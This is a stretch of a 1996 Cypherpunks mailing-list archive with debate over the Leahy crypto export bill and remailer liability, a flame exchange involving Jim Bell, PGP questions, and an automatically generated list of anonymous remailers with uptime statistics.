>claiming to always be calm and non-insulting, just claiming that the style
>of ranting is rarely effective, and I try to avoid it.)

I think your criticism is unrealistic, at least by trying to suggest that 
I'm "ranting."  I'm responding to a number of claims (the most recent one 
was from Bill Stewart) that the wart in this bill won't be abused, or at 
least not seriously.  The people who make these claims frequently use wildly 
faulty reasoning; I challenge them and (I believe) support my position with 
accurate examples and commentary to prove my point.  

Admittedly, if you were on the receiving end of my persistent efforts, you 
might feel unhappy, but that doesn't make my comments "rants."

>Screaming insults at people, resorting to ad hominem attacks on their
>personality (such as Jim did with Padgett Peterson)

I know nothing about Peterson's "personality" other than by his writing
style and 
content.  I find his commentary to be highly dishonest, because (as he fully 
admitted) he avoided  responding to the points that I had made, which had
accurately contradicted his original claims.  I'm not complaining that 
didn't quote me; it's that he ignored the issues I'd raised in challenge to 
his claims.  Further, he tried to disguise his failure by taking it off the
list.

>, ranting about how people are fools and worse,

When these people stop acting like fools...   

Look, Tim, if I'm right about the ambiguities and threats in the Leahy bill, 
then it's a serious danger to us all.  And that means that if an 
organization which is supposed to protect our interests soft-pedals the 
negatives, they are actually adding to the problem.  When I saw a number of 
organizations lap it up like a cat slurps milk, I began to wonder if they 
were really paying attention to the issues at all.

In addition, I've seen two separate comments (not on CP) by people who just 
about proudly claim that they "never" agree with me, but are actually quite 
pleased and are in agreement with my comments on this bill.  Maybe this 
should tell you that I have a point, on this issue if nowhere else.

In addition, "everybody" seems to agree that the positive parts of the bill 
are "positive," and most people can correctly identify the negative part.  
The issue is basically, "how negative" it is.  A few days ago, all we saw 
was a few press releases by these organizations falling all over themselves 
to praise the bill, and having mild criticism for the bad part.  I was the 
person who raised the issue of the serious danger of this bill to remailers 
and ISP's, which I still believe to be an accurate and very serious criticism.

Contrary to the pessimistic opinions of some others, I believe that one of 
two situations are true:

1.  The bad part is "easy" to delete, and we should  and can do so.

or

2.  Somebody REALLY wants that bad part in there, in which case we should 
carefully investigate who it is, and why he wants it there.

>Read the archives covering the several months when Detweiler (aka V. Z.
>Nuri, aka S. Boxx, aka Pablo Escobar, aka about 20 other pseudonyms) was
>foaming at the mouth about how people were mutating his brain, how the
>crypto anarchists were ignoring him, how the snakes of Medusa were hiding
>in his keyboard, and so on. Then note the similarities to Jim Bell.

Sounds like a deliberately faulty association, Tim.  I'm not responsible for 
Detweiler, and I think it's an unfair tactic to try to suggest that my 
comments are "similar."  The moment I start talking about "mutating my 
brain" or things like that, I will have earned that kind of criticism.  If 
you can show that my analysis is faulty with respect to the Leahy bill, you 
will have gone a long way to supporting your claims.  As of now, your 
disagreement is simply with my debating style, which is admittedly on the 
"hardball" side.

As for reading the archives, I'm never tried to do that, and I don't even 
know how (where) to get them.  If I felt I could learn something from it, I 
would, but you've already listed commentary by Detweiler which sounds
sufficiently 
wacky that it has to be far beyond anything I've said.  How relevant are HIS 
comments compared to anyone else you've ever disagreed with?

Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 12 Mar 1996 05:56:52 +0800
To: cypherpunks@toad.com
Subject: Cut the mystical artist crap. (No crypto relevance here)
Message-ID: <199603110110.CAA05830@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Don't mystify what an "artist" is, please!

What the compromises have to do with are that one lives in
a society with rules, mores, laws.  One of those touch-shit
facts of life.  You can do what you want, but when it involves
other people, restrictions come in.  You deal with them,
whether you are an artist, programmer, politician, goverment
wonk, or whatever.

It has nothing to do with selling out or losing integrity.
If you want food and shelter and you're not living in the
woods, then you have to play by everyone else's rules if you
don't have the power to make your own rules.

Was it Thoreau who said "Consistency is the hobgoblin of
simpletons"?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John C. Randolph" <jcr@idiom.com>
Date: Tue, 12 Mar 1996 07:57:47 +0800
To: cypherpunks@toad.com
Subject: Re: rhetorical trickery
In-Reply-To: <v02130500ad68b25e6f1a-wVB1@[205.252.17.19]>
Message-ID: <199603111126.DAA25557@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



tomservo@access.digex.net (Scott Fabbri) Says:

>An entity self-representing as "Vladimir Z. Nuri" writes:

>>sure, a government agent could insist, "well, don't be a bonehead.
>>it's obviously his diary, and surely contains all his crimes against
>>children".

>A standard attitude among LEOs is: "if you're not guilty of something, what
>are you hiding?" Skilled ones use this lever to get suspects to allow
>searches of their property on the flimsiest of pretenses.

This is why we need to adopt the standard attitude of "Well, Officer,
If you're not a jackbooted thug, why are you asking me to consent to
an unreasonable search?"

-jcr






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Tue, 12 Mar 1996 04:04:21 +0800
To: cypherpunks@toad.com
Subject: Re: Bell, Detweiler, Ravings, and Whatnot
In-Reply-To: <m0tw2is-0008ybC@pacifier.com>
Message-ID: <199603111039.EAA07811@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> As for reading the archives, I'm never tried to do that, and I don't even 
> know how (where) to get them.  If I felt I could learn something from it, I 
> would, but you've already listed commentary by Detweiler which sounds
> sufficiently 
> wacky that it has to be far beyond anything I've said.  How relevant are HIS 
> comments compared to anyone else you've ever disagreed with?

Just in case someone else is interested, the archives are at
http://www.hks.net/cpunks/index.html.  The entire history of the list is 
there, and you can browse by date, subject, or author.  You can also read 
this list and many others via the hks.net nntp server.

There's a lot of good stuff there, even if you're not interested in 
Detweiller.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 12 Mar 1996 04:17:45 +0800
To: jamesd@echeque.com
Subject: Re: Petty Civil Disobedience
In-Reply-To: <199603100537.VAA24499@mail1.best.com>
Message-ID: <QlEzJha00YUv5HNMYu@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 9-Mar-96 Re: Petty Civil
Disobedience by jamesd@echeque.com 
> At 10:31 AM 3/9/96 -0500, Declan B. McCullagh wrote:
> > Perhaps we should put up our own protest web sites with one or two
> > explicit sexual images as real civil disobedience?
>  
> Major problem here is that ten million horny geeks are likely to bring 
> your server to its knees, but if one only has one image, and it is 
> moderately small, say thirty thousand bytes, perhaps the flood would 
> taper off eventually.

jef@well.com ran into this with his nude-of-the-month page; the WELL
fixed it by throttling. (JEF is the guy who wrote thttpd)

-Declan

PS: His page is at http://www.well.com/~jef/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 11 Mar 1996 18:33:45 +0800
To: tbyfield@panix.com (t byfield)
Subject: Re: FCC & Internet phones
In-Reply-To: <v02120d00ad68230251cb@DialupEudora>
Message-ID: <wlEzPSi00YUv1HNOs9@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 10-Mar-96 Re: FCC & Internet phones
by t byfield@panix.com 
>         I think ACTA will make a valiant effort to ban this stuff, and the
> FCC might listen--if only to safeguard its purview--but the only
> "effective" way to enforce such a ban would be to impose yet another
> policing duty on ISPs. Bandwidth aside, they've got better things to worry
> about.

Unfortunately, that's not true. From:
   http://fight-censorship.dementia.org/top/

-Declan

---------- Forwarded message begins here ----------

Date: Fri, 8 Mar 1996 15:37:07 -0600
From: "Neal J. Friedman" <njf@commlaw.com>
Subject: FCC Sets Comment Date for Internet Phone Call Rulemaking     

The FCC has acted with astonishing speed in setting a date for comments on
the ACTA petition to regulate telephone calls via the Internet.  It is not
uncommon for rule making petitions to sit for weeks, months, even years
without action.  ACTA filed its petition on March 6th and two days later the
FCC issued a Public Notice seeking comment.  The deadline for comments is
April 8, 1996 with reply comments due 15 days later.

After reviewing the comments, the FCC will either terminate the proceeding
without further action or issue a Notice of Proposed Rule Making seeking
further comments on a proposed rule.

Time is of the essence for those who may be interested in opposing the
Notice.  Our law firm would be available to represent parties who may wish
to file joint comments in opposition.  Please contact me privately if you
have any interest.
  _____________________________________________________________
 |Neal J. Friedman  | Pepper & Corazzini, LLP   |Voice:       |
 | njf@commlaw.com  |   1776 K Street, N.W.     | 202-296-0600|
 |Telecommunications|       Suite 200           |Fax:         |       
 |& Information Law |  Washington, D.C. 20006   | 202-296-5572|
 |                                                            |           
 |             Web Server:  http://www.commlaw.com/           |           
 |____________________________________________________________|        










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Mon, 11 Mar 1996 19:19:06 +0800
To: cypherpunks@toad.com
Subject: Re: steganographic trick
Message-ID: <199603111054.FAA14158@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Imagine you're an FBI agent or something like that.  You've been assigned
> to investigate some guy, to include sniffing out any data he may have
> stored in encrypted format to keep private.
> 
> You de-crypt the data from some elaborate stego scheme, and find - a
> recipe for chocolate cookies.

It's funny you should joke about this.  A good friend of mine was under
serious investigation for a crime which he was not involved with, simply
because he fitted a profile.  His house was raided and he was under
surveillance on and off for 9 months.  During the house raid the cops
took away a "suspicious" disk (containing an encrypted (although not PGP)
file).  During the 9 months he was sometimes "tailed" by up to 6 cars,
and they had fitted a radio locator to his car.  They spent nearly
$500,000 investigating him, and also blew their local computer budget
trying to crack the encrypted disk.

He knows all of this information since he became friends with the
investigating officer after it became clear that my friend was innocent.
After my friend was told about their efforts to crack the disk, he showed
the investiagting officer what the encrypted file was - a .gif of Mickey Mouse!

(Note to skeptics - this is no UL - this was a good friend of mine)

Gary
- --
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@kampai.euronet.nl>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUQGRioZzwIn1bdtAQGfLgGAjZCjMWMVyBKQSYkZJzlI/7LQrInx+JYE
2bU0KKLRkBumXhhPjoLeiR5TcXNgva9N
=7uPA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Mon, 11 Mar 1996 19:32:55 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: What about PGP? (was Re: Leahy Bill a Move to Slow Crypto Exports as Much as Possible)
In-Reply-To: <ad68e730150210046ef9@[205.199.118.202]>
Message-ID: <31440843.1348@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> I think this is showing that one of the intended purposes of the Leahy bill
> is to slow down exports of crypto for as long as possible, and then only to
> grant export licenses when competition from abroad threatens to undo the
> effects of the stalling process anyway.

Hmmm.

But what about the case of PGP? It's a relatively strong product, and
an international version exists.  I'd guess that PGP 3.0 may implement
other algorithms (PK and symmetric), and likely an international PGP3
would follow... so how could the Commerce Dept rationalize not giving
an export license to ViaCrypt?

And would a similar, but non-compatible, utility that used RSA and/or
IDEA, 3DES, etc. also be exportable? ...

[Problem is that like most legislation the legalise gets confusing to
non-lawyers, and maybe even lawyers not expert in that field...]

--Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Mon, 11 Mar 1996 19:42:28 +0800
To: cypherpunks@toad.com
Subject: Re: anonymous web pages (Was: SurfWatch)
Message-ID: <199603111106.GAA14193@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Nelson Minar wrote:
> cp@proust.suba.com (Alex Strasheim) writes:
> >Has anyone ever considered setting up anonymous web sites on top of usenet?
> 
> I proposed this a couple of months ago, there should be a bit of
> discussion left over in the archives. My idea was to have an account
> keyed to a password - if you emailed the server with the right
> password, it would take the text of your email and put it in the
> specified URL. Then you can use remailers to preserve anonymity with
> the server. It's sort of like the alias.c2.org accounts.


Cant it be done with a web page consisting of usenet references?
eg:

	<HTML>
	<HEAD>
	<TITLE>Test</TITLE>
	</HEAD>

	<DL><p>
	<DT>
	<A HREF="news:199603100645.XAA00982@nelson.santafe.edu?headers=all">
	Test of news post
	</A>
	</DL>

	</body>
	</HTML>


Gary
- --
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@kampai.euronet.nl>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUQJISoZzwIn1bdtAQHsGQGA1a69oJvSO7KXYGVlRzy8H14IxwzIyybK
nsWo5tA9fLsGI8qt1o9hBkNdKEfvMt0H
=qiC8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Mon, 11 Mar 1996 19:47:10 +0800
To: cypherpunks@toad.com
Subject: Re: Leahy bill nightmare scenario?
Message-ID: <199603111112.GAA14213@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dan Weinstein writes:
Dan says "you" wrote:
> > Question:  What, exactly, is the motivation of a person running an
> > anonymous remailer?  His motivation is clear:  To allow people to
> > send anonymously untraceable messages.  Assuming he's of ordinary
> > levels of intelligence or beyond, he is aware that somebody may some
> > day use his system for illegal purposes.  You're going to have to
> > explain why a court _CAN'T_ interpret this as being in violation of
> > the law.
> 
> If I rent cars, someone might one day use a car rented from me in a
> robbery.  Does that make my an accessary?  NO.

This is an unfair analogy.  Now if you had said that you rented cars
without asking for proof of identification, thus making your car hire
centre very useful to robbers, that may more closely resemble the
anon-remailer situation.

Gary
- --
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@kampai.euronet.nl>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUQKsCoZzwIn1bdtAQFvMgF+M2YV6V31uBGswLkZtltCnwZ+Gwn3gavf
2KeYva5tb1+myr3plgxgXEvHe8wt3lXZ
=vQMv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Mon, 11 Mar 1996 22:36:56 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Bell, Detweiler, Ravings, and Whatnot
In-Reply-To: <m0tvyOG-00093IC@pacifier.com>
Message-ID: <9603110624.aa25893@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


> Well, it's a very apt invention.
> Well, until about  3/4 of a year ago, I spent no time on Internet except 
> Well, maybe at times I do get a bit testy, but most recently on this Leahy 
> jimbell@pacifier.com

Well...sound's like Ronald Regan on Acid.  
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 11 Mar 1996 23:11:56 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199603111450.GAA01786@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.alias.net> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono nymrod)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 11 Mar 96 6:48:05 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
spook    remailer@spook.alias.net                 **-+    25:32 100.00%
ecafe    cpunk@remail.ecafe.org           ####**###-++    15:00  99.99%
nymrod   nymrod@nym.alias.net             **+******-++    14:36  99.98%
replay   remailer@replay.com              +****+***-+*    29:01  99.98%
portal   hfinney@shell.portal.com         --##+#-##-**    37:14  99.97%
hacktic  remailer@utopia.hacktic.nl       **+******-++    34:21  99.96%
alpha    alias@alpha.c2.org                +.-+__+++++  1:09:47  99.95%
exon     remailer@remailer.nl.com         ----+***-*++    15:48  99.94%
c2       remail@c2.org                    ++ -*__-+*+*    43:39  99.92%
flame    remailer@flame.alias.net         -----------   3:06:48  99.86%
nemesis  remailer@meaning.com             ** -**--+-++  1:12:35  99.81%
gondonym alias@nym.gondolin.org           ------..__.* 15:01:03  99.81%
tjava    remailer@tjava.com               ###*##*###++     3:26  99.81%
vishnu   mixmaster@vishnu.alias.net       * -** ***--+    55:32  99.80%
gondolin mix@remail.gondolin.org          ------..__.* 14:43:10  99.76%
vegas    remailer@vegas.gateway.com       #+##*#+** ++     8:47  99.72%
extropia remail@extropia.wimsey.com       .+-____.-.-+ 35:57:21  99.60%
pamphlet pamphlet@idiom.com                    +---+-  17:43:46  99.58%
mix      mixmaster@remail.obscura.com     _______. - * 51:16:44  99.52%
treehole remailer@mockingbird.alias.net   -+--+-- ---+  3:32:18  99.51%
haystack haystack@holy.cow.net                  #+#-+     44:54  98.92%
penet    anon@anon.penet.fi               ......._-    30:55:28  98.39%
shinobi  remailer@shinobi.alias.net       *  ##*#**#++     8:06  97.92%
lead     mix@zifi.genetics.utah.edu         +-+++++  +    43:52  97.56%
alumni   hal@alumni.caltech.edu           - ## *-** ++    17:50  90.94%
amnesia  amnesia@chardos.connix.com                     2:59:45 -61.78%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: savron@world-net.sct.fr
Date: Mon, 11 Mar 1996 17:14:12 +0800
To: cypherpunks@toad.com
Subject: PGP reveals  the key ID of the recipient of encrypted msg
Message-ID: <199603110740.IAA06254@storm.certix.fr>
MIME-Version: 1.0
Content-Type: text/plain


I began testing PGP  a few days ago ( I'm a PGP newbie ) and I found 
that it gives out the key ID of an encrypted message . From this you 
can get the  identification of the recipient of the message , if it's 
someone who has publicaly  distributed his  key (keyserver , homepage 
...) . So even if you are unable to decode the message you  can find 
who is the recipient of a given message . I think this is a big 
privacy problem .

The problem is carried along when you encrypt a message for multiple  
recipients , you get the key IDs of all the recipients and same 
problem as above .  I think something like 'blind email copy' should 
be used , because the recipients don't have to know the identity of 
each other .

Comments from long time PGPer  will be welcome




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: savron@world-net.sct.fr
Date: Tue, 12 Mar 1996 15:44:28 +0800
To: cypherpunks@toad.com
Subject: PGP : what to do when a user ID has multiple RSA keys
Message-ID: <199603110740.IAA06248@storm.certix.fr>
MIME-Version: 1.0
Content-Type: text/plain


My DOS version of PGP 2.6.2 came with a built in PUBRING.PGP 
containing two keys ( 1024 and 512 size ) with the same user ID .
For testing  purposes I wanted to encrypt a message with the 512 
length key , but only the 1024 size key could be used .

How can I select the right key , apart from making a clone 
PUBRING.PGP with only the key I want to use ?

Any comment welcome




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: savron@world-net.sct.fr
Date: Tue, 12 Mar 1996 15:42:40 +0800
To: cypherpunks@toad.com
Subject: Re: TCP/IP Stego
Message-ID: <199603110740.IAA06251@storm.certix.fr>
MIME-Version: 1.0
Content-Type: text/plain


It seems that bit fiddling involve a direct connection of two 
partners having each one a TCP/IP Stego adapted kernel to work .
This is a direction to study , but we can't forget those who can't 
directly connect with their 'stego' partner . We can't forget also 
those who can't hack their kernel .

Any comment welcome




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shabbir@vtw.org (Shabbir J. Safdar)
Date: Mon, 11 Mar 1996 21:23:48 +0800
To: Mutant Rob <wlkngowl@unix.asb.com>
Subject: Re: What about PGP? (was Re: Leahy Bill a Move to Slow Crypto Exports as Much as Possible)
Message-ID: <199603111304.IAA04507@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Mutant Rob writes:
>Timothy C. May wrote:
>> I think this is showing that one of the intended purposes of the Leahy bill
>> is to slow down exports of crypto for as long as possible, and then only to
>> grant export licenses when competition from abroad threatens to undo the
>> effects of the stalling process anyway.

I think this is somewhat skewed.  Let's look at our situation now:

	We don't get to export much crypto software.

The Leahy bill takes us to:

	We get to export lots of software that is "generally available",
	"in the public domain or publicly available", or if similar
	products exist already in other countries.  (That's a lot of
	stuff, but it's not the whole enchilada.)

We want to be at:

	We get to export all crypto software. (I mean legally; I think
	we all know that export controls don't work against someone with
	enough brains to post news, send mail, or use ftp)

This is a pretty good improvement in the situation, and will hopefully
pave the way for the "whole enchilada".  It's not good strategy though
to criticize this because it's not the ultimate crypto bill.  Let's be
honest with ourselves here, this is Congress we're talking about and
this is a pretty bold step.  We need to educate them to see the facts
we understand so thoroughly: that crypto export controls do not work,
endanger our own requirements for confidentiality, and aren't helping
contain this technology in the rest of the world.

Forcing Congress to have this debate will lay bare these facts and
hopefully embarass the Administration for their absurd policy
approach on encryption.

They say that liberty is seldom lost all at once, but a little at a time. 
Regaining it is probably done this way as well.  In this case, the
Leahy bill gives us back a mouthful.

-S

>
>Hmmm.
>
>But what about the case of PGP? It's a relatively strong product, and
>an international version exists.  I'd guess that PGP 3.0 may implement
>other algorithms (PK and symmetric), and likely an international PGP3
>would follow... so how could the Commerce Dept rationalize not giving
>an export license to ViaCrypt?
>
>And would a similar, but non-compatible, utility that used RSA and/or
>IDEA, 3DES, etc. also be exportable? ...
>
-Shabbir J. Safdar * Online Representative * Voters Telecomm. Watch (VTW)
 http://www.vtw.org/ * Defending Your Rights In Cyberspace





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 12 Mar 1996 02:53:56 +0800
To: Gary Howland <cypherpunks@toad.com
Subject: Re: Leahy bill nightmare scenario?
Message-ID: <m0twAV8-0008yYC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:12 AM 3/11/96 -0500, Gary Howland wrote:
>Dan Weinstein writes:
>Dan says "you" wrote:
>> > Question:  What, exactly, is the motivation of a person running an
>> > anonymous remailer?  His motivation is clear:  To allow people to
>> > send anonymously untraceable messages.  Assuming he's of ordinary
>> > levels of intelligence or beyond, he is aware that somebody may some
>> > day use his system for illegal purposes.  You're going to have to
>> > explain why a court _CAN'T_ interpret this as being in violation of
>> > the law.
>> 
>> If I rent cars, someone might one day use a car rented from me in a
>> robbery.  Does that make my an accessary?  NO.
>
>This is an unfair analogy.  Now if you had said that you rented cars
>without asking for proof of identification, thus making your car hire
>centre very useful to robbers, that may more closely resemble the
>anon-remailer situation.
>Gary

Exactly!  I'm glad you noticed, and commented.  As  you've noticed, I keep 
getting faulty reasoning from people who SHOULD know better.  Analogies are 
extremely useful, but if they are poorly crafted, they do little more than 
show the limitations of their author.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 13 Mar 1996 06:14:16 +0800
To: wlkngowl@unix.asb.com>
Subject: Re: What about PGP? (was Re: Leahy Bill a Move to Slow Crypto Exports as Much as Possible)
Message-ID: <m0twAv7-00094GC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:04 AM 3/11/96 -0500, Shabbir J. Safdar wrote:

>I think this is somewhat skewed.  Let's look at our situation now:
>
>	We don't get to export much crypto software.
>
>The Leahy bill takes us to:
>
>	We get to export lots of software that is "generally available",
>	"in the public domain or publicly available", or if similar
>	products exist already in other countries.  (That's a lot of
>	stuff, but it's not the whole enchilada.)

This is very debateable.  Generally, I've found that the government will 
always disappoint you, in the implementation of any legislation, "good" or 
"bad."  The "good" gets less good, the "bad" gets more bad.

>We want to be at:

>
>	We get to export all crypto software. (I mean legally; I think
>	we all know that export controls don't work against someone with
>	enough brains to post news, send mail, or use ftp)
>
>This is a pretty good improvement in the situation, and will hopefully
>pave the way for the "whole enchilada".  It's not good strategy though
>to criticize this because it's not the ultimate crypto bill. 

I don't know about others, but _I_ haven't done that.  I've made some 
distinct criticisms that say NOTHING about the extent to which export 
controls are loosened.  (I leave that part of the issue alone because it is 
being addressed properly, unlike the matters I'm focussing on.)


BTW, it has been two days since my first comment to you, however, and you have
presumably seen a few more criticisms that I've heaped on a portion of the 
bill.  Your response (or lack of it) is particularly unexpected, because you 
ought to be interested in defending a  positive review of the bill.  
